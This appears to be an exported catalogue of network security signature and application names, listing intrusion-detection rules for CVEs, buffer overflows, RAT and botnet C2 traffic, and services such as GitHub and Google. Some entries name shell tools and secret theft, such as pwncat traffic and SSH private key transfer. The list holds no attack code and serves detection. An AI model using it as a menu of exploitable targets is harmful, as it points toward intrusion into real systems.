Generic_Ssl-PCT-Buffer-Overflow
Generic_Sun-Directory-Server-LDAP-DOS-2
Generic_Sun-Microsystems-Java-System-Web-Proxy-Sockd-Daemon-Buffer-Overflow
Generic_SunRPC-CMSD-CREATE-Buffer-Overflow
Generic_SunRPC-SnmpXdmid-Exploit-Detected
Generic_Suspiciously-Long-URI-Component
Generic_Symantec-Alert-Management-Arbitrary-Program-Execution
Generic_Symantec-Alert-Management-System-Alert-Originator-Service-BOF
Generic_Symantec-Alert-Management-System-Arbitrary-Remote-Command-Execution
Generic_Symantec-Alert-Management-System-Potential-Remote-Command-Execution
Generic_Symantec-AntiVirus-Real-Time-Virus-Scan-Service-Stack-Overflow-Exploit
Generic_Symantec-Discovery-XFERWAN-Service-Buffer-Overflow
Generic_Symantec-Veritas-NetBackup-Command-Chaining
Generic_Symantec-Veritas-NetBackup-Connect-Option-Request-Buffer-Overflow
Generic_TCP-Apache-Dubbo-Routing-Configuration-Unsafe-YAML-Unmarshalling
Generic_TCP-Apache-Dubbo-Script-Routing-Remote-Code-Execution
Generic_TCP-Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass
Generic_TCP-CA-Unified-Infrastructure-Management-Nimcontroller-Buffer-Overflow
Generic_TCP-Cesanta-Mongoose-Parse_MQTT-DOS
Generic_TCP-Cisco-IOS-And-IOS-XE-Software-Smart-Install-Buffer-Overflow
Generic_TCP-Cisco-SMI-Exploit-CVE-2018-0171
Generic_TCP-CS-Digium-Asterisk-SIP-Sscanf-Denial-Of-Service
Generic_TCP-Curl-SOCKS5-Heap-Buffer-Overflow-CVE-2023-38545
Generic_TCP-DarkVNC-C2-Traffic
Generic_TCP-Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
Generic_TCP-Fatal-RAT-Infection-Traffic
Generic_TCP-Ficker-Stealer-Infection-Traffic
Generic_TCP-IBM-TM1-Planning-Analytics-Remote-Code-Execution
Generic_TCP-ISC-DHCP-Server-Omapi-Denial-Of-Service
Generic_TCP-Ivanti-Avalanche-Certificate-Management-Server-Insecure-Deserialization
Generic_TCP-Ivanti-Avalanche-Jwttokenutility-Insecure-Deserialization
Generic_TCP-Ivanti-Avalanche-Smartdeviceserver-Devicelogsmanager-Directory-Traversal
Generic_TCP-LuminosityLink-RAT-C2-Traffic
Generic_TCP-NightFury-Infection-Traffic
Generic_TCP-OpenBSD-TCP-Timeout-Calculation-Denial-Of-Service
Generic_TCP-Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection
Generic_TCP-Oracle-MySQL-Cluster-GSN_CREATE_NODEGROUP_IMPL_REQ-RCE
Generic_TCP-Oracle-WebLogic-CVE-2020-14625-Insecure-Deserialization
Generic_TCP-Oracle-WebLogic-CVE-2020-14644-Insecure-Deserialization
Generic_TCP-Oracle-WebLogic-CVE-2020-14825-Insecure-Deserialization
Generic_TCP-Oracle-WebLogic-CVE-2020-14841-IIOP-JNDI-Injection
Generic_TCP-pwncat-Traffic
Generic_TCP-Quagga-BGP-Daemon-BGP_Capability_Msg_Parse-Denial-Of-Service
Generic_TCP-Quagga-BGP-Daemon-Notify-Attribute-Out-Of-Bounds-Read
Generic_TCP-SIET-Change_Config-Command
Generic_TCP-SIET-Get_Config-Command
Generic_TCP-SIET-Update_ios-And-Execute-Command
Generic_TCP-SSH-Private-Key-File-Transfer
Generic_TCP-Tightvnc-Vncviewer-InitialiseRFBConnection-Heap-Buffer-Overflow
Generic_TCP-VMware-Vcenter-Server-Integer-Underflow-CVE-2024-37079
Generic_TIP-Microsoft-Distributed-Transaction-Controller-Primary-Node-DoS
Generic_Trend-Micro-ServerProtect-EarthAgent-String-Buffer-Overflow
Generic_Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF
Generic_UDP-Anviz-CrossChex-Buffer-Overflow
Generic_UDP-AnyDesk-GUI-Format-String-Write
Generic_UDP-Atftp-TFTP-Server-Error-Packet-DoS
Generic_UDP-Avaya-Winpdm-Unite-Host-Router-Service-Stack-Buffer-Overflow
Generic_UDP-Azeotech-DAQFactory-NETB-Buffer-Overflow
Generic_UDP-BACnet-Atomic-Read-File
Generic_UDP-BACnet-Atomic-Write-File
Generic_UDP-Bash-Shellshock-Code-Injection
Generic_UDP-Beckhoff-Twincat-DoS
Generic_UDP-BitTorrent-UDP-Traffic
Generic_UDP-Bomberclone-Buffer-Overflow
Generic_UDP-BSD-Nfs-Server-Readdir-Request-Memory-Corruption
Generic_UDP-CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Handle-T
Generic_UDP-Check-Point-VPN-1-ASN.1-Decoding-Heap-Overflow
Generic_UDP-Chrome-Remote-Desktop-Usage
Generic_UDP-Cisco-Adaptive-Security-Appliance-IKEv1-And-IKEv2-Heap-Buffer-Overflow
Generic_UDP-Cisco-ASA-SNMP-ExtraBacon-Exploit
Generic_UDP-Cisco-IKE-Information-Disclosure
Generic_UDP-Cisco-Secure-ACS-EAP-TLS-Authentication-Bypass-Vulnerability
Generic_UDP-Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow
Generic_UDP-Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow-2
Generic_UDP-Citrix-Provisioning-Services-Streamprocess.exe-Stack-Buffer-Overflow
Generic_UDP-CMSD-Procedure-0x0a
Generic_UDP-Computer-Associates-BrightStor-Arcserve-Backup-MediaSRV.exe-Buffer-Overflow
Generic_UDP-Corosync-Cluster-Engine-Totemcrypto.c-Integer-Overflow
Generic_UDP-Curl-And-Libcurl-TFTP-OACK-blksize-Heap-Buffer-Overflow
Generic_UDP-D-Link-DAP-1160-Unauthenticated-Remote-Command
Generic_UDP-D-Link-Devices-Unauthenticated-ssdpcgi-RCE
Generic_UDP-Dhcpcd-Dhcpv6-Dhcp6_Findna-Buffer-Overflow
Generic_UDP-Dhcpd-Packet-Size-Stack-Buffer-Overflow
Generic_UDP-Dhcpv6-Buffer-Overread-CVE-2023-38152
Generic_UDP-Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution
Generic_UDP-Digium-Asterisk-Compound-Rtcp-Out-Of-Bounds-Write
Generic_UDP-Digium-Asterisk-CSeq-Heap-Buffer-Overflow
Generic_UDP-Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service
Generic_UDP-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption
Generic_UDP-Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service
Generic_UDP-Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
Generic_UDP-Digium-Asterisk-RTP-Stack-Information-Disclosure
Generic_UDP-Digium-Asterisk-Unnegotiated-RTP-Payload-Type-Denial-Of-Service
Generic_UDP-Digium-Multiple-Asterisk-Products-IAX2-Channel-Driver-Denial-of-Service
Generic_UDP-Dnsmasq-Dhcpv6-Information-Disclosure
Generic_UDP-Dnsmasq-Dhcpv6-Stack-Buffer-Overflow
Generic_UDP-DTLS-ClientHello-Request
Generic_UDP-DTLS-ServerHello-Request
Generic_UDP-Enterasys-Network-Management-Suite-Syslog-Stack-Based-Buffer-Overflow
Generic_UDP-Ethereal-NetFlow-Buffer-Overflow
Generic_UDP-FreeBSD-Routed-Daemon-Routing-Information-Protocol-Assertion-Failure
Generic_UDP-FreeRADIUS-Access-Request-Denial-Of-Service
Generic_UDP-FreeRADIUS-Ascend-Send-Receive-Secret-DoS
Generic_UDP-FreeRADIUS-Client-Certificate-Verification-Stack-Buffer-Overflow
Generic_UDP-FreeRADIUS-Data2vp_Wimax-Heap-Buffer-Overflow
Generic_UDP-FreeRADIUS-Rad_Coalesce-Out-Of-Bounds-Read
Generic_UDP-Glutton-Backdoor-C2-Traffic
Generic_UDP-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
Generic_UDP-Heimdal-KDC-ASN1-der-Length-Denial-Of-Service
Generic_UDP-HNS-Botnet-C2-Traffic
Generic_UDP-HP-Intelligent-Management-Center-Dbman-Buffer-Overflow
Generic_UDP-HP-Intelligent-Management-Center-Stack-Based-Buffer-Overflow
Generic_UDP-HP-Intelligent-Management-Center-Uam.exe-Stack-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-D-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-L-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-P-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-T-Buffer-Overflow
Generic_UDP-HP-Network-Node-Manager-I-Ovopi.dll-Vulnerable-Command-Usage
Generic_UDP-HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
Generic_UDP-HPE-Intelligent-Management-Center-Imcwlandm-Ssid-Stack-Buffer-Overflow
Generic_UDP-HPE-Intelligent-Management-Center-Imcwlandm-Username-Stack-Buffer-Overflow
Generic_UDP-IAS-MS-CHAP-V2-Authentication-Bypass
Generic_UDP-IAX2-Malformed-ACK-Message
Generic_UDP-IBM-Informix-Dynamic-Server-SunRPC-Buffer-Overflow
Generic_UDP-IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-Code-Execution
Generic_UDP-IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-DoS
Generic_UDP-IKEv2-IKE_Sa_Init-Using-PRF_GMAC_md5
Generic_UDP-IntelliCom-NetBiter-Config-Utility-Hostname-Stack-Buffer-Overflow
Generic_UDP-Inter-Asterix-Exchange-Version-2-Protocol-New-Call-Request
Generic_UDP-IPMI-Cipher-Zero-Mode
Generic_UDP-Ipswitch-WS_FTP-Logging-Server-Daemon-Denial-Of-Service
Generic_UDP-ISC-Bind-Lwresd-Query-Name-Denial-Of-Service
Generic_UDP-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection
Generic_UDP-ISC-DHCP-dhclient-Pretty_Print_Option-Stack-Buffer-Overflow
Generic_UDP-ISC-DHCP-dhclient-script-write-params-Buffer-Overflow
Generic_UDP-ISC-DHCP-Server-Dhcpv6-Null-Pointer-Dereference
Generic_UDP-ISC-DHCP-Server-Duid-Handling-Stack-Buffer-Overflow
Generic_UDP-Kame-Racoon-X509-Certificate-Verification
Generic_UDP-Kaskad-Dasever-Heap-Overflow
Generic_UDP-Kerberos-Cross-Realm-Referrals-KDC-Null-Pointer-Dereference-Denial-Of-Service
Generic_UDP-Kerberos-Multi-Realm-KDC-Null-Pointer-Dereference-Denial-Of-Service
Generic_UDP-Libupnp-Device-Service-Name-Stack-Buffer-Overflow
Generic_UDP-Libupnp-Devices-Uuid-Service-Name-Stack-Buffer-Overflow
Generic_UDP-Libupnp-Root-Device-Service-Name-Stack-Buffer-Overflow
Generic_UDP-Linux-Kernel-Cipso-IP-Option-Infinite-Loop-DOS
Generic_UDP-Linux-Kernel-ICMP-Packet-Handling-Denial-Of-Service
Generic_UDP-Linux-Kernel-IPv4_pktinfo_prepare-Denial-Of-Service
Generic_UDP-Linux-Kernel-Nfsd-Subsystem-Buffer-Overflow
Generic_UDP-Linux-Kernel-TIPC-Fragment-Handling-Use-After-Free-CVE-2024-36886
Generic_UDP-Linux-Kernel-TIPC-Heap-Buffer-Overflow
Generic_UDP-Linux-Kernel-TIPC-Stack-Buffer-Overflow-CVE-2022-0435
Generic_UDP-Malicious-Packet
Generic_UDP-MAPI-Microsoft-Exchange-Server-MS09-003-DOS
Generic_UDP-McAfee-Epolicy-Orchestrator-Framework-Services-Format-String
Generic_UDP-Measuresoft-ScadaPro-Directory-Traversal
Generic_UDP-Measuresoft-ScadaPro-Remote-Code-Execution
Generic_UDP-Media-Services-Buffer-Overflow-CVE-2010-0478
Generic_UDP-Memcached-Traffic-Amplification-UDP-Packet-Spoofing
Generic_UDP-Microsoft-DHCP-Server-Service-Remote-Code-Execution-Vulnerability-CVE-2023-28231
Generic_UDP-Microsoft-DirectPlay-Denial-Of-Service
Generic_UDP-Microsoft-Network-Policy-Server-Radius-Denial-Of-Service
Generic_UDP-Microsoft-Network-Policy-Server-Radius-Denial-Of-Service-CVE-2016-0050
Generic_UDP-Microsoft-Windows-2000-Domain-Authentication-Bypass
Generic_UDP-Microsoft-Windows-Active-Directory-Browser-Election-Buffer-Overflow
Generic_UDP-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
Generic_UDP-Microsoft-Windows-Dhcpv6-Client-Parsedhcpv6options-Code-Execution
Generic_UDP-Microsoft-Windows-DNS-Client-Service-CVE-2011-0657
Generic_UDP-Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
Generic_UDP-Microsoft-Windows-DNS-Spoofing-Vulnerability
Generic_UDP-Microsoft-Windows-IKE-Ikeinitmmresponderphase1-Null-Pointer-Dereference
Generic_UDP-Microsoft-Windows-IKE-Vendor-Id-CVE-2023-21547-Null-Pointer-Dereference
Generic_UDP-Microsoft-Windows-Internet-Key-Exchange-Protocol-Extensions-Denial-of-Service
Generic_UDP-Microsoft-Windows-NFS-Server-CVE-2020-17051
Generic_UDP-Microsoft-Windows-NFS-Server-CVE-2020-17056
Generic_UDP-Microsoft-Windows-NFS-Server-RCE-CVE-2021-26432
Generic_UDP-Microsoft-Windows-QUIC-Version-Negotiation-Packet-Handling-Denial-Of-Service
Generic_UDP-Microsoft-Windows-Remote-Desktop-Gateway-CVE-2020-0610-Code-Execution
Generic_UDP-Microsoft-WINS-DoS
Generic_UDP-Microsoft-WPAD-Proxy-Discovery-Privilege-Escalation
Generic_UDP-Microsoft_Windows_Out_Of_Bounds_Vulnerability_CVE-2020-0609
Generic_UDP-MiniUPnP-Denial-Of-Service
Generic_UDP-MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service
Generic_UDP-MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service
Generic_UDP-MIT-Kerberos-5-KDC-prep_reprocess_req-Null-Pointer-Dereference
Generic_UDP-MIT-Kerberos-5-kpasswd-UDP-Ping-Pong-Denial-Of-Service
Generic_UDP-MIT-Kerberos-KDC-Authentication-Denial-Of-Service
Generic_UDP-MIT-Kerberos-KDC-Cross-Realm-Referral-Denial-of-Service
Generic_UDP-MIT-Kerberos-KDC-Null-Pointer-Denial-Of-Service
Generic_UDP-MIT-Kerberos-KDC-Ticket-Validation-Double-Free-Memory-Corruption
Generic_UDP-MIT-Kerberos-V5-Kadmind-Klog_vsyslog-Server-Stack-Buffer-Overflow
Generic_UDP-MIT-KerberosAsn1_Decode_Generaltime-Uninitialized-Pointer-Reference
Generic_UDP-Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow
Generic_UDP-MOXA-Device-Credential-Retrieval
Generic_UDP-MS-Host-Integration-Server-Snabase.exe-Memory-Access-Error
Generic_UDP-MSRPC-Big-Endian-Byte-Order-Used
Generic_UDP-MSRPC-Small-Fragments-Used
Generic_UDP-Multiple-Vendors-Calendar-Manager-RPC-Service-Memory-Corruption
Generic_UDP-Nessus-Vulnerability-Scanner-Usage
Generic_UDP-Netis-Router-Backdoor
Generic_UDP-NFS-Access-Reply-Access-To-Directory-Denied
Generic_UDP-NFS-Rename-Call
Generic_UDP-Norton-Internet-Security-NBNS-Response-Processing-Stack-Overflow
Generic_UDP-Novell-eDirectory-NCP-Stack-Buffer-Overflow
Generic_UDP-Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow
Generic_UDP-Novell-NetWare-Xnfs-Caller-Name-Xdrdecodestring-Heap-Buffer-Overflow
Generic_UDP-Novell-NetWare-Xnfs.nlm-Stack-Buffer-Overflow
Generic_UDP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow
Generic_UDP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow-2
Generic_UDP-Novell-ZENworks-Configuration-Management-Preboot-Policy-Service-Buffer-Overflow
Generic_UDP-OpenAFS-Getstatistics64-RPC-Buffer-Overflow
Generic_UDP-OpenSLP-Project-And-VMware-OpenSLP-Heap-Buffer-Overflow
Generic_UDP-OpenSSL-DTLS-Client-Hello-Zero-Fragment-Length
Generic_UDP-OpenSSL-DTLS-Dtls1_Buffer_Record-Denial-Of-Service
Generic_UDP-OpenSSL-DTLS-Handshake-Double-Free
Generic_UDP-OpenSSL-DTLS-Handshake-Memory-Exhaustion
Generic_UDP-OpenSSL-DTLS-Packet-ChangeCipherSpec-Remote-DoS
Generic_UDP-OpenSSL-Dtls1_Reassemble_Fragment-Invalid-Fragment-Buffer-Overflow
Generic_UDP-OpenVPN-P_Control-Denial-Of-Service
Generic_UDP-OpenVPN-Read_Key-Stack-Based-Buffer-Overflow
Generic_UDP-OpenVPN-Server-And-Client-Mss_fixup_IPv6-Denial-Of-Service
Generic_UDP-Out-Of-State-DNS-Response-With-Additional-Record
Generic_UDP-Palevo-Activity
Generic_UDP-Plex-Media-Server-Reflection-DDoS-CVE-2021-33959
Generic_UDP-PPStream-Media-Transfer
Generic_UDP-Pro-Server-EX-Denial-Of-Service
Generic_UDP-QUIC-Client-Hello
Generic_UDP-Quic-go-Crypto-Ack-Nil-Pointer-Dereference
Generic_UDP-Racer-Buffer-Overflow
Generic_UDP-RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow
Generic_UDP-RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow
Generic_UDP-Realtek-SDK-MP-Daemon-UDPServer-Command-Injection-CVE-2021-35394
Generic_UDP-RPC-Ypupdated-Arbitrary-Command-Execution
Generic_UDP-Rpcbind-Xdr-Parsing-Memory-Exhaustion-Denial-Of-Service
Generic_UDP-Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service
Generic_UDP-Rugged-Director-Denial-Of-Service
Generic_UDP-Safenet-Softremote-Stack-Based-Buffer-Overflow
Generic_UDP-Samba-Domain-Controller-Crafted-Mailslot-Name-Buffer-Overflow
Generic_UDP-Samba-NetBIOS-Replies-Stack-Based-Buffer-Overflow
Generic_UDP-Shared-Variables
Generic_UDP-Siemens-SIPROTEC-4-And-SIPROTEC-Compact-EN100-Ethernet-Module-DoS
Generic_UDP-Snort-Back-Orifice-Pre-Processor-Buffer-Overflow
Generic_UDP-Snort-frag3-Preprocessor-Fragmented-IP-Packet-Detection-Evasion
Generic_UDP-Solaris-Rwalld-RPC-Call-Format-String
Generic_UDP-Spotify-UDP-Traffic
Generic_UDP-Squid-ASN.1-Header-Parsing-Denial-of-Service
Generic_UDP-Squid-Proxy-HTCP-Packet-Processing-Denial-Of-Service
Generic_UDP-Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability
Generic_UDP-Squid-WCCP-Malformed-Message-DoS
Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-1
Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-2
Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-3
Generic_UDP-StrongSwan-Gmp-Plugin-Denial-Of-Service
Generic_UDP-StrongSwan-OpenSSL-Plugin-Fips-Mode-Denial-Of-Service
Generic_UDP-StrongSwan-Rsassa-Pss-Signature-Denial-Of-Service
Generic_UDP-StrongSwan-X509-Plugin-Denial-Of-Service
Generic_UDP-Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution
Generic_UDP-Sun-Solaris-Rwhod-Buffer-Overflow
Generic_UDP-Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow
Generic_UDP-Sun-Solaris-sadmind-RPC-Request-Integer-Overflow-CVE-2008-3870
Generic_UDP-SunRPC-Portmapper-Dump-Query
Generic_UDP-SunRPC-Portmapper-GetPort-Query
Generic_UDP-SunRPC-Xdr-Xdrmem-Getbytes-Integer-Overflow
Generic_UDP-Suspicious-IPP-Request-CVE-2024-47176
Generic_UDP-Suspicious-Packet
Generic_UDP-Suspicious-Server-Certificate
Generic_UDP-Symantec-DNS-Compression-DoS
Generic_UDP-Symantec-Multiple-Products-ISAKMPD-Denial-Of-Service
Generic_UDP-Symantec-Norton-Firewall-NBNS-Response-Remote-Heap-Corruption
Generic_UDP-Symantec-pcAnywhere-Client-Name-Query
Generic_UDP-Symantec-pcAnywhere-Client-Name-Reply
Generic_UDP-Symantec-Veritas-Storage-Foundation-Buffer-Overflow
Generic_UDP-Tcpdump-ISAKMP-Payload-Handling-DOS
Generic_UDP-TP-Link-Archer-A7-tdpServer-Command-Injection
Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver1
Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver2
Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver3
Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver4
Generic_UDP-Unix-System-Monitor-Messages
Generic_UDP-UPnP-IGD-Apple-Mac-OSX-mDNSResponder-Compromise
Generic_UDP-Valve-Steam-Server-Query
Generic_UDP-Valve-Steam-Usage
Generic_UDP-W32/Nuwar@mm-Activity
Generic_UDP-W32/Nuwar@mm-Encrypted-Traffic
Generic_UDP-Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809
Generic_UDP-Windows-NFS-CVE-2022-24491
Generic_UDP-Windows-NFS-CVE-2022-24497
Generic_UDP-WinRadius-User-Password-Option-Size-Validation-Buffer-Overflow
Generic_UDP-WINS-WPAD-Host-Name-Registration
Generic_UDP-Wireshark-Bluetooth-SDP-Dissector-Heap-Buffer-Overflow
Generic_UDP-Wireshark-Capwap-Dissector-Denial-Of-Service
Generic_UDP-Wireshark-LWRES-Dissector-Stack-Based-Buffer-Overflow
Generic_UDP-Xdmcp-Double-Free
Generic_UDP-XTACACSD-Buffer-Overflow
Generic_UDP-Yokogawa-CENTUM-CS3000-BKFSim_vhfd.exe-Stack-Based-Buffer-Overflow
Generic_UDP-Your-Freedom-UDP-Packet
Generic_UDP-ZeroAccess-P2P-Communication
Generic_UDP-ZeroAccess.B-Traffic
Generic_UDP-ZyXEL-Command-Injection-CVE-2023-28771
Generic_UDP_ABB-Multiple-Products-Robnetscanhost.exe-Stack-Buffer-Overflow
Generic_Veritas-Backup-Exec-Agent-Authentication-Bypass
Generic_Veritas-Backup-Exec-Agent-Browser-BOF
Generic_Veritas-Backup-Exec-Agent-Buffer-Overflow
Generic_Veritas-Backup-Exec-Server-Anonymous-Registry-Access
Generic_Veritas-NetBackup-Java-Authentication-Service-Compromise
Generic_Veritas-NetBackup-Vnetd-Buffer-Overflow
Generic_Visual-IRC-JOIN-Command-Response-Handling-Buffer-Overflow
Generic_VMware-Authentication-Server-Denial-Of-Service
Generic_VNC-Remote-Control-Connection
Generic_Windows-Messenger-Service-NetrSendMessage-Usage
Generixgroup
Genesys
Genesyslab
Genetec
Genetec Updater
Genialchat
Genie9
GenieDB
Genius
Geniusinside
GenMyModel
Genoo
Gensuite
Geocaching
Geologic
Geoop
Geotoko
Geotrust-OCSP
GESIO-Online-Business-Solutions
Get-It-Done
Get-Satisfaction
getAbstract
Getapp
GetDashboard
GetDoneDone
GetFeedback
Getquantify
GetResponse
Getronics
Getty-Images
Gface
GFI-Cloud
GFIMax-Remote-Management
GFT
GHG-Corporation
GIF File
Giga-Alert
Gigamon
Gigasize
GigaSpaces
Gigaup
Gigya
Ginkgotree
Ginzametrics
Giosg
Giphy
Git
Git
GitHub
Gitlab
GKG-Net
Glance
Glasscubes
Glassdoor
Glesys
Glide
Gliffy
Global-Cloud-Xchange
GlobalCollect
Globaledit
GlobalLogic
GlobalMeet
GlobalRelay
Globalscape
Globe-Business
Globi
globo.com
Globoforce
Globus Compute
Glogster-EDU
Gluu
GMAC
Gmail
GMX
Gmx-Mail
Gnu-httptunnel
Gnutella
Go-Reception
Go.com
GoalBook
GoAnywhere-MFT
GoAssign
GoBig-Inc.
GoCardless
GoCodes-Asset-Management
GoCodes-Fixed-Asset-Management-and-Inventory-Tracking
GoComics
Godaddy-CRL
Godaddy-OCSP
goEmerchant
GoFileRoom
GoFundMe
Gog
Goget
Gogiro
Gogo-Inflight-Internet
Gogobox
GoingUp!
Golden-Frog
GoldenCAN---Merchant
GoldenLine
Gomeetnow
Gonitro
Gonitro File Download
Gonitro File Upload
Goo-Blog
Goo-Webmail
GoodBye-Chain-Group
GoodData
Goodreads
Goodsie
GoodSync
Google
Google Chrome
Google Drive
Google SafeSearch Resolve
Google SafeSearch Rewrite
Google Update
Google-Accounts
Google-Ad-Services
Google-Admeld
Google-Adsense
Google-Adwords
Google-Analytics
Google-Android-Dalvik
Google-Answers
Google-App-Engine
Google-Books
Google-Cache
Google-Calendar
Google-Chrome-Update
Google-Cloud
Google-Code
Google-Desktop
Google-Docs
Google-DoubleClick
Google-Drive
Google-Earth
Google-Feedburner
Google-Finance
Google-Groups
Google-Hangouts
Google-Hosted-Libraries
Google-Images
Google-Keep
Google-Maps
Google-Merchant-Center
Google-Music-(music-Beta)
Google-News
Google-Orkut
Google-Photos
Google-Picasa
Google-Play
Google-Plus
Google-Safebrowsing
Google-Sites
Google-Talk
Google-Translate
Google-Trends
Google-Url-Shortener
Google-Wave
Google-Workspace
Goomzee-Commerce
GooodJob
GoPay
GoPlan
Gorkana
Gosquared
GoSystem-Tax-RS
GoToAssist
GoToAssist
GoToMeeting
GoToMyPC
Gototraining
Gotowebinar
Gourmondo
Government
GPass
GQueues
gQUIC
GrabCAD
Graboid
Gracenote
Graduates
Graduway
Grafetee
GrammarBase
Grammarly
Grammarly
GrapeCity
Grappster
Grasshopper
Gravatar
GravityMarket-Platform
GRC-Cloud
GRE-unknown-version
Great-West-Retirement-Services
Gree
Green-Cloud
Greenclouds
Greenhouse
GreenQloud
GreenRope
Greenshot
Greenview-Data-Email
Greenway
Greenwicheantime.com
Grepsr
GrexIt
Greytip
GRE_Checksum-Mismatch
GRE_Header-Short
GRE_Keepalive
GRE_PPTP-Version
GRE_Tunnel-Other-Protocol
GridVision
Grockit
Grok
Groove
Groove Music
Grooveshark
Grosocial
GROU.PS
GroupCamp-Project
GroupDocs-Document-Manipulation-APIs
GroupMe
Groupon
GroupQuality
Groupspaces
Grovo
Gses
GT-Nexus
GTI-File-Reputation_Connection_to_cloud_acquired
GTI-File-Reputation_Connection_to_cloud_lost
GTI_Cannot_connect_to_cloud
GTmetrix
GTP_BCD-Invalid-Encoding
GTP_Conditional-IE-Missing
GTP_Connection-Allowed
GTP_Duplicated_Message
GTP_Fragmentation-Exceeded
GTP_GPDU-Access-Denied
GTP_GSN-Incorrect-Reset
GTP_GSN-Missing-Address
GTP_GSN-Reset
GTP_Inconsistent-Length
GTP_Invalid-Address-Length
GTP_Invalid-Address-Type
GTP_Invalid-Extheader-Length
GTP_IP-Missing
GTP_IPv6_not_supported
GTP_Mandatory-IE-Missing
GTP_Message-Overflow
GTP_Missing-Seq-Number
GTP_Missing-TEID
GTP_NSAPI-does-not-match
GTP_PDP-Context-Created
GTP_PDP-Context-Deleted
GTP_PDP-context-Updated
GTP_PDP-CTX-Not-Found
GTP_PDP_CTX-invalid-state
GTP_PDP_CTX_24h_Timeout
GTP_Redundant-IE
GTP_Spoofed-PDP-Context-Delete
GTP_Superfluous-NPDU
GTP_Superfluous-TID
GTP_TEID_Collision
GTP_Tunneling-GTP-In-GTP
GTP_Unexpected-Message-Value
GTP_Unexpected-Seq-Number
GTP_Unexpected-Update
GTP_Unexpected_Response
GTP_Unhandled-Parse-Error
GTP_Unknown-Extheader
GTP_Unknown-IE
GTP_Unknown-Message
GTP_Unknown-Protocol
GTP_Unknown-Source
GTP_Unsupported-Protocol
GTP_Unsupported-Version
GTP_Used-Spare
GTP_Wrong-Port
GTP_Wrong-Value
Guardian-Life-Insurance
Guavus
GuestCentric-Integrated-platform
Guidance-Software
Guidewire
Guildwars2
Gumtree
gUnify
Gurock-Software
Guru.com
GXS-RollStream
Gyao!
Gyao-Webmail
Gym-Master
H2Desk
H323_CS-Message-Alerting
H323_CS-Message-Call-Proceeding
H323_CS-Message-Connect
H323_CS-Message-Release-Complete-From-Callee
H323_CS-Message-Release-Complete-From-Caller
H323_CS-Message-Setup
Habbo
HabitMix
HackerOne
HackerRank
Hacking
Haiku-Deck
Haiku-LMS
Hallmark
HAMS-GPS-EHS-Software
Handelsbanken
HANDS-HQ
Handset-Detection
Handshake
Handy-Backup
Handy-Hardware
Handzon
Hangame
Hansaworld
Hao123
HappyCo
HappyFox
HardisGroup
Harlequin-Games
HarmonyPSA
Harvard-Business-Review
Harvest
HasOffers
Hatchbuck
Hatena-Diary
Haveamint
hazMIN
Hbo
Hbo-Go
HDFS
HeadsUp
Health
Health-Care
Health-Partners
HealthCareSource-Performance-Manager
HEALTHsuite-Mercato
HealthVault
Heap-CRM
Heart-Internet
Heavy resources consumption on Log Server.
Heavy resources consumption on Management Server.
Heavy resources consumption warning.
Hello-Scheduling
HelloFax
HelloSign
Hellowallet
HelloWorld
Helmet
Help-Scout
Helpdesk-Pilot
HelpDeskSaaS
HelpIQ
HelpMaster
HelpOnClick-Live-Chat
Helpshift
Helsingin-Sanomat
Heroku
Hetzner
HexaTier
Hexaware
Hexigo
Hey Cortana
Hi5
Hiboox
Hide-My-Axx
Hide-My-IP
Hide-Your-IP
HideMyTRAX-Proxy
HiDrive
High Load Degrades Inspection Level
Highjump
Highline
HighOrbit
HighRadius
Highrise
HighTail
Highwire
Hike-POS
Hilton-Worldwide
HiMama
HIMSS-Analytics
Hinet-Webmail
Hipchat
HipLink
Hipmob
Hipmunk
Hippo-CMMS
Hirebridge
HireFire
HireHive
HireMojo
HireRight
HireServe
HireVue
Hiring-Thing
HiStats
hitAppoint
hiTask
HitsLink
Hittail
Hive-Cloud
Hive-Live
HKTV-Mall
Hobbies
HockeyApp
Hojoki
Hola-Unblocker
Holt-McDougal-Online
HomeMarks
Homestead
Hootsuite
Hoovers
